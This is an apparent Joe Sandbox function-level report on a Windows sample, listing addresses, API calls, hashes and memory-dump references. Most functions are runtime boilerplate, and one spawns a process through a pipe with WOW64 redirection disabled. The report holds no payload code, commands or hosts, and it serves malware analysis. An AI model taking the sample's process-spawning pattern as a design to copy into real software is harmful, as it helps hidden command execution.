Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac2c11185d8fc5ad81346666ec16ea2fa478ee6a3bab73839346bcea6eaf536
Instruction ID: 66e459fc7a3291f202d7bd366dbc31cf35fd42a090c87f28985596677f558861
Opcode Fuzzy Hash: 0ac2c11185d8fc5ad81346666ec16ea2fa478ee6a3bab73839346bcea6eaf536
Instruction Fuzzy Hash: 4FF130B5E012199FDF19CFA9C8806EEBBB1FF48314F158269D815AB384D7319E41CB90

Function 0031F06F Relevance: 3.1, APIs: 2, Instructions: 81timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0031F07F

Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE

GetTimeZoneInformation.KERNEL32 ref: 0031F091

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 3107070095-0
Opcode ID: 0fab5116c2e42756d5100bc6d2722156838900a87e3645ecedcacd67fb302803
Instruction ID: ec3c1ce11d3f6c511e25c7e8f7ee36e1c408509a87faf4d63efbcdd844deff01
Opcode Fuzzy Hash: 0fab5116c2e42756d5100bc6d2722156838900a87e3645ecedcacd67fb302803
Instruction Fuzzy Hash: 4421A575901120AFCB1BAF65CC02BDABFB4EF49310F158167F905AF1A1D731A950DB90

Function 003121E3 Relevance: 3.0, APIs: 2, Instructions: 34timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002E7EE2,00000000,AA6E0749), ref: 003121F6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00312227

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: ea36f6aa5b9e4127fb682c432e762431730d65eb7ade3602980d29d132eba154
Instruction ID: a6850be5286f885be30d26a7c14802ac0c5f0f46a6151fadce3c381b4cbb7abb
Opcode Fuzzy Hash: ea36f6aa5b9e4127fb682c432e762431730d65eb7ade3602980d29d132eba154
Instruction Fuzzy Hash: 12F02B34900204BBDB0EDF64CC46FEE76E9EB48325F204A48A402E6180D674EA418750

Function 002E4EF0 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

<o4, xrefs: 002E4FCB
<o4, xrefs: 002E50A7

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID: <o4$<o4
API String ID: 0-2656834769
Opcode ID: 321a268a1dd6db27f8ad8564012da6d6fc36e2e2dc3096d09d0a3d13f75788ea
Instruction ID: eb6e31ffae780ab07243f05d1ca87c653acfbd6e111735327aa9894c63de8393
Opcode Fuzzy Hash: 321a268a1dd6db27f8ad8564012da6d6fc36e2e2dc3096d09d0a3d13f75788ea
Instruction Fuzzy Hash: 21916534A246C98FDB12CF69C4907EEBBF6EF5A304F94455CE4949B782C3768506CBA0

Function 002E51A0 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

<o4, xrefs: 002E5377
<o4, xrefs: 002E5287

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID: <o4$<o4
API String ID: 0-2656834769
Opcode ID: d8539a7383f4de503e0dcdb6f2b298fb1e2beef680df9f23c5bcf9cd04d9d8ad
Instruction ID: f106b848c74a77347b374de6707a75e62509d11dd00b27caf1b6b4b9fe4ee640
Opcode Fuzzy Hash: d8539a7383f4de503e0dcdb6f2b298fb1e2beef680df9f23c5bcf9cd04d9d8ad
Instruction Fuzzy Hash: A7814774E246A68FDB05CF69D4907EEBBF5FB1A304F8402A9D85097383C3719855CBA0

Function 0031CDCD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0031CDC8,?,?,00000008,?,?,00326890,00000000), ref: 0031CFFA

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: a8f0eeedb6bb9b13172c6d8b3aa339ef475b1987871bec0630e221a61d9a37d5
Instruction ID: c6b3719cc69b77b3b9db04138312ebca0b80b1204247a0808ee3e298f85dc6e0
Opcode Fuzzy Hash: a8f0eeedb6bb9b13172c6d8b3aa339ef475b1987871bec0630e221a61d9a37d5
Instruction Fuzzy Hash: 50B14F31620605DFD71ACF28C486BA57BE1FF4D365F268658E899CF2A1C335E992CB40

Function 0030AA7F Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0030AA95

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 6f936fbc9435817730ee4bbf7825f8f1989c9d3ad42e22d842cd2f0e534600fc
Instruction ID: c62a2f93f2bd3a0867b7933991f57a79c5c4dc76bf57180da048befd6e70ecd6
Opcode Fuzzy Hash: 6f936fbc9435817730ee4bbf7825f8f1989c9d3ad42e22d842cd2f0e534600fc
Instruction Fuzzy Hash: CB51D4B5D02715CFEB2ACF55E8963AEBBF5FB06310F15802AC401EB291D775A900CB91

Function 00322B7C Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

Part of subcall function 003171C0: _free.LIBCMT ref: 00317222
Part of subcall function 003171C0: _free.LIBCMT ref: 00317258

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00322BD0

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: ebe720404ef9497b7e689a72dbb363c127278a54796491f733304a8a5d544f81
Instruction ID: 94a2d1a7dcd02538319eaf12f41b1718194c2a099078d0de99a5040f70519a58
Opcode Fuzzy Hash: ebe720404ef9497b7e689a72dbb363c127278a54796491f733304a8a5d544f81
Instruction Fuzzy Hash: D421837161522ABBDB2AAB25EC82EBF73ACEF15310F11007AFD01DA241EA74ED408654

Function 00322DA8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00322B45,00000000,00000000,?), ref: 00322DD4

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 02daec627efab1d2a1508f6e05cf43e8ef138ca34e0a5b89c8897f6d03bf4ca3
Instruction ID: 630d3c3b3c2044d3f98ed6caabe7e4f7cb562dfb867b7fddeb68b5d01cd0923a
Opcode Fuzzy Hash: 02daec627efab1d2a1508f6e05cf43e8ef138ca34e0a5b89c8897f6d03bf4ca3
Instruction Fuzzy Hash: EBF0A9325001257BDB295B65DC46ABB7768EB40754F1A0439ED16B3140EA74FE42D5D0

Function 0032289E Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

EnumSystemLocalesW.KERNEL32(00322B7C,00000001,00000000,?,-00000050,?,00322F1B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 003228E8

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2d57e51768bb69ef0791de5503ab982dfc78c1e121ddb704bc038b4ab9f8777f
Instruction ID: 478f5984785ef73930e4845f46e19bc2080623d3023a8b0c292826e9d4dc8ac8
Opcode Fuzzy Hash: 2d57e51768bb69ef0791de5503ab982dfc78c1e121ddb704bc038b4ab9f8777f
Instruction Fuzzy Hash: 63F046363003042FDB165F38EC81ABB7B91EF81368F05443DFA018B680C6719C41D740

Function 003188AC Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00312AE0: EnterCriticalSection.KERNEL32(-00037DA1,?,00313DC5,00000000,00344038,0000000C,00313D8C,?,?,0031ABB3,?,?,00317362), ref: 00312AEF

EnumSystemLocalesW.KERNEL32(Function_0003889F,00000001,00344258,0000000C,00318CCA,?), ref: 003188E4

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 7e70e9bfab7e519fa70e5f67901334a487129d9f498ebe7255dbab0d68b7bbe7
Instruction ID: 77137f9cce521eba27c14cff3fbc2fffd786b0d03341de36201aea9639d3924c
Opcode Fuzzy Hash: 7e70e9bfab7e519fa70e5f67901334a487129d9f498ebe7255dbab0d68b7bbe7
Instruction Fuzzy Hash: B8F04936A00244EFD716DF98E842BDE77F0EB49720F10852AF411EF2A0CBB559408F45

Function 003227B8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

EnumSystemLocalesW.KERNEL32(00322711,00000001,00000000,?,?,00322F79,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 003227EF

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 069c08b43abf1d6b67cd263b186a71587a1616653abc157ff089d4a0626c6425
Instruction ID: 18b87206e736cb61f2c01d7486506b92faef74f8cfb1002734ee075554479ba6
Opcode Fuzzy Hash: 069c08b43abf1d6b67cd263b186a71587a1616653abc157ff089d4a0626c6425
Instruction Fuzzy Hash: 0DF0E53A30421567CB06AF39EC456ABBFA4EFC2B10F1B4059EE058B691CA719882D790

Function 0030A9F8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002AA04,0030A51B), ref: 0030A9FD

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4444933a151d73219f5c5645247a9b2e9ff483ff5eefd34310964ea39730886a
Instruction ID: 8086c81738ec960429ceec4db05bf4a69b08d58d6606328c0e14d9c77058a7ad
Opcode Fuzzy Hash: 4444933a151d73219f5c5645247a9b2e9ff483ff5eefd34310964ea39730886a
Instruction Fuzzy Hash:

Function 0030FDCB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 0030FF47

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e95a2fa80e74959b2b2ea43d4c42b3595dc8b2ab61d35824eb6c17c18f79c8ea
Instruction ID: b818ab74ba8d10382994b5d44201b3a9a97940976d4a0f655c13afa4903b922b
Opcode Fuzzy Hash: e95a2fa80e74959b2b2ea43d4c42b3595dc8b2ab61d35824eb6c17c18f79c8ea
Instruction Fuzzy Hash: 4751693160364A5EDB3F9A2CC8B57BE6789AB07700F15043EE582DBEE3C651DD85C292

Function 003264E4 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

y2, xrefs: 00326544

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID: y2
API String ID: 0-3524986787
Opcode ID: bbac612a5956678d72b0eeffa43674c27943b8e6f5dfd36f8259fd5efe5515da
Instruction ID: 47aaaed0b256de6897cdecf5295b68941c6fa8d43e87a81beb5bbbb38b919569
Opcode Fuzzy Hash: bbac612a5956678d72b0eeffa43674c27943b8e6f5dfd36f8259fd5efe5515da
Instruction Fuzzy Hash: 4821B373F204394B7B0CC47E8C572BDB6E1C68C601745823EF8A6EA2C1D968D917E2E4

Function 00320BE2 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00320BE2

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: e8a53bbcca13e8ee16f2d48ac1919b16804c2c7b0613f477f923fe396cec886d
Instruction ID: 628c6d8eeada82f5a2612787204bd845549266ed9f3f0213e10364f84991ab8e
Opcode Fuzzy Hash: e8a53bbcca13e8ee16f2d48ac1919b16804c2c7b0613f477f923fe396cec886d
Instruction Fuzzy Hash: 54A01138A002808F83028F38AA8838A3AACAA02380F08002AA008C8020EA2080808B02

Function 002E5450 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e23262826ee13cb3ccbd78b9b01c1d6886998cf872e131bc92bb1d8a589e07
Instruction ID: fd6d0f791fef263b4c0d0dbd99f189ed988e909848d0f14997f22e6bf1810d75
Opcode Fuzzy Hash: 30e23262826ee13cb3ccbd78b9b01c1d6886998cf872e131bc92bb1d8a589e07
Instruction Fuzzy Hash: 04224EB7F515144BDB0CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158644

Function 0031D559 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b1a0d6af95849f3bd67146f200d0fe42e46dc79d205a78ddee3171d4646954
Instruction ID: 177d049c0a3beaee7762517f56ebe70479afe51d5674a20ede845901dbea1f49
Opcode Fuzzy Hash: f8b1a0d6af95849f3bd67146f200d0fe42e46dc79d205a78ddee3171d4646954
Instruction Fuzzy Hash: 20320422D29F054DD7279638D862335A28DAFBB3D4F15D727F81AB5AA9EF29C4C34100

Function 003263C4 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b34ed583b49176a5ed86d1d694c3cd736d73cd940357b96ee17f4e6dacdacd0
Instruction ID: 7a28b72e265cfdbf9fb046c43d2a64f21d94b158b6c3e4321089e5c7cd30ef63
Opcode Fuzzy Hash: 9b34ed583b49176a5ed86d1d694c3cd736d73cd940357b96ee17f4e6dacdacd0
Instruction Fuzzy Hash: 2E11A733F30C255B675C81698C1727A96D6DBD824075F533AD826EB2C4E994DE13D290

Function 0030BBB0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 5bcc983492f1bfa97e950867d3615a192b3e4915121a48a077cb9926da5d058e
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 1211EE7720304243F61AC66ED5F46B6F79EEBC532172E437AD0434BBD8DB22D9459500

Function 003166E2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
Instruction ID: ab23febb306108635e4bc19bc7a04c12f4af56af3ffdbdb69dcbe2bb53c860e8
Opcode Fuzzy Hash: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
Instruction Fuzzy Hash: 50E08C72911228EBCB1ADBCCC905D8AF3ECEB49B04B114496F501D7280C670DF40C7E0

Function 002E8280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000080,?), ref: 002E832D
CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 002E8403
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 002E8415
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 002E8459
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 002E8481
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 002E848F
WaitForSingleObject.KERNEL32(?,00000064), ref: 002E84B8
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 002E84DA
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 002E84FE
ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 002E8525
